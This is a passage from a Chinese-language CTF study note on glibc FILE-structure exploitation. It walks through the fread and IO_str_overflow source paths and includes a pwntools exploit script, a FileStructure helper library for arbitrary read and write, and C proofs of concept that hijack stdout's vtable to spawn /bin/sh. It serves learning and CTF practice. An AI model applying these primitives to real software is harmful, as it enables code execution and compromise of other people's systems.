p->_IO_buf_end = target + sizeof(buf) + 1;
p->_IO_read_ptr = target;
p->_IO_read_end = target;
p->_fileno = 0;
fread(buf, 1, sizeof(buf), p);
puts(target);
}
```
我們輸入的東西被確實的寫到了target
```c
ctf@dab0beb7c7ce:~/pwn/FS$ ./demo
Let's Demo a arbitrary write
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaatk��
```
一樣來看為甚麼這樣設定
### fread IO source code
目標是要進到underflow中call read syscall
需要bypass一些東西
首先我們不希望他malloc一塊,所以我們要把 fp->_IO_buf_base 賦值
把他設為要寫的地方
```c
size_t
_IO_file_xsgetn (FILE *fp, void *data, size_t n)
{
size_t want, have;
ssize_t count;
char *s = data;
want = n;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
```
want是要讀取的數量,正常都會>0
have 是 fp->_IO_read_end - fp->_IO_read_ptr ,是剩餘buffer的數量
我們要進到underflow,所以把fp->_IO_read_end 和 fp->_IO_read_ptr 設為相等,讓have是0會方便很多
這樣不會進
if (want <= have)
if (have > 0)
兩條
backup基本上也都不會進
```c
while (want > 0)
{
have = fp->_IO_read_end - fp->_IO_read_ptr;
if (want <= have)
{
memcpy (s, fp->_IO_read_ptr, want);
fp->_IO_read_ptr += want;
want = 0;
}
else
{
if (have > 0)
{
s = __mempcpy (s, fp->_IO_read_ptr, have);
want -= have;
fp->_IO_read_ptr += have;
}
/* Check for backup and repeat */
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
continue;
}
```
這邊的話之前已經設定過了fp->_IO_buf_base,所以會過
want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base)
這邊我們把他設定成我們要讀取的值長度左右就可以了
所以設成了
sizeof(buf) + 1
```c
/* If we now want less than a buffer, underflow and repeat
the copy. Otherwise, _IO_SYSREAD directly to
the user buffer. */
if (fp->_IO_buf_base
&& want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
{
if (__underflow (fp) == EOF)
break;
continue;
}
```
__underflow 內的東西都不用繞,出問題了再來檢查就好
```c
int
__underflow (FILE *fp)
{
if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
return EOF;
if (fp->_mode == 0)
_IO_fwide (fp, -1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_get_mode (fp) == EOF)
return EOF;
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
}
if (_IO_have_markers (fp))
{
if (save_for_backup (fp, fp->_IO_read_end))
return EOF;
}
else if (_IO_have_backup (fp))
_IO_free_backup_area (fp);
return _IO_UNDERFLOW (fp);
}
libc_hidden_def (__underflow)
```
進 _IO_UNDERFLOW -> _IO_file_underflow -> _IO_new_file_underflow
這部分也是有問題再繞,基本上都不會進
最後會call IO syscall read
```c
int
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;
/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;
if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);
if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);
_IO_release_lock (stdout);
}
_IO_switch_to_get_mode (fp);
/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;
count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
```
另外我們把fileno設為了stdin,他會從你的stdin開始讀
這樣他就將我們的stdin讀到target了
### 題目
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
char flag[0x10] = "FLAG{TEST}\n";
char owo[] = "OWO!";
int main()
{
FILE *fp;
char *buf;
buf = malloc(0x10);
fp = fopen("/tmp/meow", "r");
read(0, buf, 0x1000);
fread(buf, 0x10, 1, fp);
if (strcmp(owo, "OWO!") != 0)
write(1, flag, sizeof(flag));
return 0;
}
```
一樣有heap overflow的問題,padding 一樣
設定該設定的
p->_IO_buf_base = target;
p->_IO_buf_end = target + sizeof(buf) + 1;
p->_fileno = 0;
並且一樣要設定_lock成合法的位置
一樣不要蓋到vtable
```python=
from NAUP_pwn_lib import *
import time
from NAUP_filestructure_lib import *
def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)
context(arch = 'amd64', os = 'linux')
REMOTE_LOCAL=input("local?(y/n):")
if REMOTE_LOCAL=="y":
r=process('./aaw')
debug_init()
else:
REMOTE_INFO=split_nc("nc naup.com 2000")
REMOTE_IP=REMOTE_INFO[0]
REMOTE_PORT=int(REMOTE_INFO[1])
r=remote(REMOTE_IP,REMOTE_PORT)
### exploit
target_addr = 0x404070
lock_addr = 0x4040a0
padding = flat(0x0,0x0,0x0,0x1e1)
FS = FILESTRUCTURE()
payload = FS.aaw(padding,0x0,target_addr,0x5,lock_addr)
s(payload)
###
ita()
```
NAUP_filestructure_lib.py
```python=
from pwn import *
class FILESTRUCTURE:
def __init__(self):
self.FS = FileStructure(0)
def aar(self, padding: bytes ,flags: int ,target_addr: int ,size: int ,lock_addr:int ):
self.FS.flags = flags
self.FS._IO_read_end = target_addr
self.FS._IO_write_base = target_addr
self.FS._IO_buf_end = target_addr + size
self.FS._IO_write_ptr = target_addr + size
self.FS._lock = lock_addr
self.FS.fileno = 1
return padding + bytes(self.FS)[:-8]
def aaw(self, padding: bytes , flags: int , target_addr: int , size: int, lock_addr:int ):
self.FS._lock = lock_addr
self.FS._IO_buf_base = target_addr
self.FS._IO_buf_end = target_addr + size
self.FS._IO_read_ptr = target_addr
self.FS._IO_read_end = target_addr
self.FS.fileno = 0
return padding + bytes(self.FS)[:-8]
```
腳本跑完後,多輸入幾個觸發EOF
就可以任意讀了
![image](https://hackmd.io/_uploads/HJGijni2A.png)
## IO_FILE_PLUS exploitation
### glibc 2.24 <
在glibc 2.24前,如果我去修改FILE pluse中指向vtable的pointer,不會做檢查
所以我可以嘗試偽造一個vtable在stack上或其他地方,然後指過去,vtable中可以將某些變數改為自己想要跳轉的地方
```
IO_FILE_plus fake vtable
-------------- --> --------------
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
| vtable | ----- | |
-------------- --------------
```
像是這樣
```c
#include <stdio.h>
// Testing with libc-2.23
// gcc fake_vtable.c -o fake_vtable
void backdoor(void)
{
system("/bin/sh");
}
int main(void)
{
char *p;
void **vtable;
void *fake_vtable[20];
p = stdout;
vtable = (void *)&p[0xd8];
*vtable = fake_vtable;
fake_vtable[7] = backdoor;
puts("Demo");
}
```
先做一個假的vtable,fake_vtable[7]是__xsputn,我把它改成backdoor,這樣當我們call put就會跳上去
```c
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
```
```
ctf@dab0beb7c7ce:~/pwn/FS$ ./demoplus
$ ls
demo demo.c demoplus demoplus.c fread.txt
```
開成功
### glibc 2.24 >
按照剛剛打法直接噴了error
```
naup@naup-virtual-machine:~/Desktop/cwctCTF$ ./demo
Fatal error: glibc detected an invalid stdio handle
```
那是因為他檢查了vtable所在的位置
直接舉個例子當我們call _IO_sputn,他是一個macro,展開來後
```c
#define _IO_sputn(__fp, __s, __n) _IO_XSPUTN (__fp, __s, __n)
```
```c
#define _IO_XSPUTN(FP, DATA, N) JUMP2 (__xsputn, FP, DATA, N)
```
```c
#define JUMP2(FUNC, THIS, X1, X2) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2)
```
```c
# define _IO_JUMPS_FUNC(THIS) \
(IO_validate_vtable \
(*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \
+ (THIS)->_vtable_offset)))
```
macro展開後call IO_validate_vtable會檢查他在哪個區段
在 __stop___libc_IO_vtables ~ __start___libc_IO_vtables;
中就可以過
```c
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
uintptr_t ptr = (uintptr_t) vtable;
uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
if (__glibc_unlikely (offset >= section_length))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}
```
繞過不實際
```c
void attribute_hidden
_IO_vtable_check (void)
{
#ifdef SHARED
/* Honor the compatibility flag. */
void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (flag);
#endif
if (flag == &_IO_vtable_check)
return;
/* In case this libc copy is in a non-default namespace, we always
need to accept foreign vtables because there is always a
possibility that FILE * objects are passed across the linking
boundary. */
{
Dl_info di;
struct link_map *l;
if (!rtld_active ()
|| (_dl_addr (_IO_vtable_check, &di, &l, NULL) != 0
&& l->l_ns != LM_ID_BASE))
return;
}
#else /* !SHARED */
/* We cannot perform vtable validation in the static dlopen case
because FILE * handles might be passed back and forth across the
boundary. Therefore, we disable checking in this case. */
if (__dlopen != NULL)
return;
#endif
__libc_fatal ("Fatal error: glibc detected an invalid stdio handle\n");
}
```
可以直接改vtable上的pointer成如Onegadget等位置,然而需要Glibc 2.29後,因為2.29前放在不可寫段
### IO_str_jumps (glibc 2.27)
在Glibc < 2.29時候
還有其他地方的vtable可以利用
這裡有 IO_str_jumps可以嘗試做利用
```c
const struct _IO_jump_t _IO_str_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_str_finish),
JUMP_INIT(overflow, _IO_str_overflow),
JUMP_INIT(underflow, _IO_str_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_str_pbackfail),
JUMP_INIT(xsputn, _IO_default_xsputn),
JUMP_INIT(xsgetn, _IO_default_xsgetn),
JUMP_INIT(seekoff, _IO_str_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_default_setbuf),
JUMP_INIT(sync, _IO_default_sync),
JUMP_INIT(doallocate, _IO_default_doallocate),
JUMP_INIT(read, _IO_default_read),
JUMP_INIT(write, _IO_default_write),
JUMP_INIT(seek, _IO_default_seek),
JUMP_INIT(close, _IO_default_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};
```
他是 IO_strfile 用的
如果我將stdout中的vtable指向IO_str_jumps,並讓stdout\[7\](也就是第八個)為IO_str_overflow,這樣puts就會call到IO_str_overflow(原本是xsputn)
他會在這個section中不會有問題
```
IO_FILE_plus fake vtable (IO_str_jumps)
-------------- --> ----------------------
| | | | |
| | | | |
| | | | |
| | | | |
| | | | DUMMY1 |
| vtable | ----- | DUMMY2 |
-------------- | _IO_str_finish |
| _IO_str_overflow |
| |
----------------------
```
接下來我們依據glibc 2.27去追 _IO_str_overflow source code
https://elixir.bootlin.com/glibc/glibc-2.27/source/libio/strops.c#L80
```c
#define _IO_blen(fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base)
int
_IO_str_overflow (_IO_FILE *fp, int c)
{
int flush_only = c == EOF;
_IO_size_t pos;
if (fp->_flags & _IO_NO_WRITES)
return flush_only ? 0 : EOF;
if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
{
fp->_flags |= _IO_CURRENTLY_PUTTING;
fp->_IO_write_ptr = fp->_IO_read_ptr;
fp->_IO_read_ptr = fp->_IO_read_end;
}
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (_IO_size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
char *new_buf;
char *old_buf = fp->_IO_buf_base;
size_t old_blen = _IO_blen (fp);
_IO_size_t new_size = 2 * old_blen + 100;
if (new_size < old_blen)
return EOF;
new_buf
= (char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size);
if (new_buf == NULL)
{
/* __ferror(fp) = 1; */
return EOF;
}
if (old_buf)
{
memcpy (new_buf, old_buf, old_blen);
(*((_IO_strfile *) fp)->_s._free_buffer) (old_buf);
/* Make sure _IO_setb won't try to delete _IO_buf_base. */
fp->_IO_buf_base = NULL;
}
memset (new_buf + old_blen, '\0', new_size - old_blen);
_IO_setb (fp, new_buf, new_buf + new_size, 1);
fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);
fp->_IO_write_base = new_buf;
fp->_IO_write_end = fp->_IO_buf_end;
}
}
if (!flush_only)
*fp->_IO_write_ptr++ = (unsigned char) c;
if (fp->_IO_write_ptr > fp->_IO_read_end)
fp->_IO_read_end = fp->_IO_write_ptr;
return c;
}
libc_hidden_def (_IO_str_overflow)
```
我們目標是`(char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size)`
如果我們把 _s._allocate_buffer 寫成 system
new size 寫成 /bin/sh
就可以成功
以下是 PoC
```c
#include <stdio.h>
#include <stdlib.h>
// Testing with libc-2.27
// gcc iostroverflow.c -o iostroverflow
// typedef struct {
// int _flags;
// char *_IO_read_ptr;
// char *_IO_read_end;
// char *_IO_read_base;
// char *_IO_write_base;
// char *_IO_write_ptr;
// char *_IO_write_end;
// char *_IO_buf_base;
// char *_IO_buf_end;
// char *_IO_save_base;
// char *_IO_backup_base;
// char *_IO_save_end;
// void *_markers;
// void *_chain;
// int _fileno;
// } _IO_FILE;
int main(void)
{
char *p;
void **vtable;
void *libc;
void **_IO_str_jumps;
void **_s;
char sh[] = "/bin/sh";
libc = (char *)printf - 0x64f00;
_IO_str_jumps = (char *)libc + 0x3e8360;
p = stdout;
vtable = (void *)&p[0xd8];
_s = (void *)&p[0xe0];
// Set vtable[7] = _IO_str_overflow
*vtable = _IO_str_jumps + 3 - 7;
// Set fp->_s._allocate_buffer
*_s = system;
// Set new_size
((_IO_FILE *)p)->_IO_buf_base = 0;
((_IO_FILE *)p)->_IO_buf_end = (unsigned long long)(sh - 100) / 2;
// Set pos >= _IO_blen(fp) + flush_only
((_IO_FILE *)p)->_IO_write_base = 0;
((_IO_FILE *)p)->_IO_write_ptr = ((_IO_FILE *)p)->_IO_buf_end + 1;
// Call _IO_str_overflow
puts("Demo");
}
```
### IO_str_jumps (glibc 2.29)
那就會想說為甚麼不直接改vtable值為one gadget
因為這個section是ro段(蠻合理的,畢竟vtable是用來查function位置,不需要w權限),不過在glibc 2.29它變成不是ro,所以利用起來很簡單
```c
#include <stdio.h>
#include <stdlib.h>
// Testing with libc-2.29
// gcc overwrite_iovtables.c -o overwrite_iovtables
// typedef struct {
// int _flags;
// char *_IO_read_ptr;
// char *_IO_read_end;
// char *_IO_read_base;
// char *_IO_write_base;
// char *_IO_write_ptr;
// char *_IO_write_end;
// char *_IO_buf_base;
// char *_IO_buf_end;
// char *_IO_save_base;
// char *_IO_backup_base;
// char *_IO_save_end;
// void *_markers;
// void *_chain;
// int _fileno;
// } _IO_FILE;
void backdoor(void)
{
system("/bin/sh");
}
int main(void)
{
char *p;
void **vtable;
void *libc;
void **_IO_str_jumps;
void **_s;
libc = (char *)printf - 0x62830;
_IO_str_jumps = (char *)libc + 0x1e6620;
p = stdout;
vtable = (void *)&p[0xd8];
// Set vtable[7] = _IO_str_jumps.overflow
*vtable = _IO_str_jumps + 3 - 7;
// Overwrite _IO_str_jumps.overflow to backdoor
_IO_str_jumps[3] = backdoor;
// Call vtable[7] --> call backdoor
puts("Demo");
}
```
(這邊我看得一臉矇,不知道為甚麼要改成可寫,不過後來又改回去了)
## FSOP(glibc < 2.24)
也可以通過hijack _IO_list_all 來偽造一整條chain
_IO_flush_all_lockp 會去把所有的file structure上東西flush(所以會call _IO_OVERFLOW)
main return、libc 記憶體error、call exit都會call到_IO_flush_all_lockp
## ref
https://tttang.com/archive/1345/
https://blog.csdn.net/qq_41202237/article/details/113845320
https://blog.wingszeng.top/pwn-glibc-file-struct-and-related-functions/
https://blog.csdn.net/m0_70811813/article/details/127218742?ops_request_misc=%257B%2522request%255Fid%2522%253A%252207DB9A83-4C5B-4673-AB65-C877A51684E7%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=07DB9A83-4C5B-4673-AB65-C877A51684E7&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2
https://a1ex.online/2020/10/01/glibc-IO%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/
https://www.youtube.com/watch?v=_TYWsA8gEW0
https://github.com/u1f383/Software-Security-2021-2022/tree/master/2022/week3
https://www.mrskye.cn/archives/221/